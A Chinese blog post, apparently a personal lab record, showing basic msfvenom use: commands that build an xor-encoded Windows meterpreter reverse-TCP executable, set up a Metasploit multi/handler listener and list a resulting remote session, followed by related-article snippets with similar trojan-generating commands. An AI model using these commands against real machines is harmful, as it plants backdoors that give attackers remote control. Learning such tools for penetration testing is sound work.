msfvenom 简单利用记录

最新推荐文章于 2024-07-03 18:58:43 发布
最新推荐文章于 2024-07-03 18:58:43 发布
阅读量475 收藏
点赞数
分类专栏: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_41380394/article/details/81432211
版权

msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。

 

简单生成一个反弹tcp的exe文件,使用编码方式是xor:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -i 5 -f exe -o /test.exe

 

打开msfconsole,

use exploit/multi/handler

设置payload,

set payload windows/meterpreter/reverse_tcp

show info和show options显示不同,用options显示需要的参数。

接下来用set LHOST等设置ip,端口,run执行监听。

 

连接成功以后,用sessions -l显示连接,sessions -<id>进入连接

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  1         meterpreter x64/windows  WIN-76353R2J6TB\lc @ WIN-76353R2J6TB  192.168.0.120:4444 -> 192.168.0.107:49282 (192.168.0.107)

进入以后使用命令和help可以查看帮助,background可以退出挂起

meterpreter > pwd
C:\Users\lc\Downloads
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) >

 

sinat_41380394
关注
专栏目录
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
msfvenom的介绍以及基本使用
H_zcn的博客
10-22 1394
metasploit是一个非常强大的攻击,它不仅仅是能对windows系统进行攻击,还支持全平台的攻击,例如Linux,macOS,安卓手机等等,在上一篇metasploit框架介绍中我们简单的了解了metasploit里一些基本框架与命令,以及还体验了最基本的攻击流程,接下来我将进一步的介绍metasploit另外的一些功能与使用方法。msfvenom 有病毒,毒液的意思,它有来生成后门的功能。msfvenom是msfpayload(攻击载荷)和msfencode(编码加密)的组合。
metasploit中msfvenom命令解释说明
WEL测试
08-29 6545
我使用的版本如下图所示:v4.16.0-dev- 在这个版中,之前的msfpayload、msfencode命令被整合到msfvenom中。 在命令行执行命令:msfvenom -h可以查看msfvenom解释说明: 针对上面的信息进行解释如下: MsfVenom:是Metasploit的独立负荷(payload)生成器。同时也替代了命令msfpayload、msfenco
【木马生成工具】Msfvenom介绍及利用
最新发布
aheyor的博客
07-03 1326
msfvenom aMetasploitstandalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
Msfvenom介绍及利用
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom常用参数
m0_61506558的博客
08-29 1584
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3590
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
柠檬:简单MSFVenom有效负载生成器
02-14
柠檬 一个简单MSFVenom有效载荷生成器 安装 git clone https://github.com/spicesouls/lemon cd lemon bash setup.sh python3 lemon.py
msfvenom基本使用
02-24
`msfvenom` 是 Metasploit 框架中的一个强大工具,用于创建各种类型的恶意软件或后门。在渗透测试中,它被广泛用于生成定制的payload,以适应不同的攻击场景和目标环境。以下是对 `msfvenom` 基本使用和相关知识点的...
76-76.渗透测试-msfvenom 常用参数下.mp4
05-10
76-76.渗透测试-msfvenom 常用参数下.mp4
75-75.渗透测试-msfvenom 常用参数上.mp4
05-10
75-75.渗透测试-msfvenom 常用参数上.mp4
使用msfvenom远程控制
m0_68638628的博客
06-29 1043
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控端winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控端payload.exe生成到/var/payload.exe。
msfvenom介绍
weixin_46483815的博客
05-11 2223
主要介绍msfvenom 和一些实验
网络攻防作业——Msfvenom的使用
yyy7654321的博客
06-28 2881
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
Msfvenom简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
msfvenom 基本使用
blackguest07的博客
03-05 1575
msfvenom 基础命令
msfvenom简单使用
jeff_true的博客
01-14 645
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
msfvenom生成木马的简单利用
weixin_43966088的博客
09-20 2087
msfvenom生成木马的简单利用 kali
Msfvenom生成后门及运用
快吃小蛋糕吧的博客
10-01 4960
title: Msfvenom生成后门及运用 date: 2020-10-01 15:34:16 tags: [Metasploit,Backdoor] categories: 网络安全 Msfvenom生成后门及运用 本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。 后门的生成: 首先通过各种操作系统,脚本语言来生成后门: 常用参数说明: e 编码方式 i 编码次数 b 在生成的程序中避免出.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值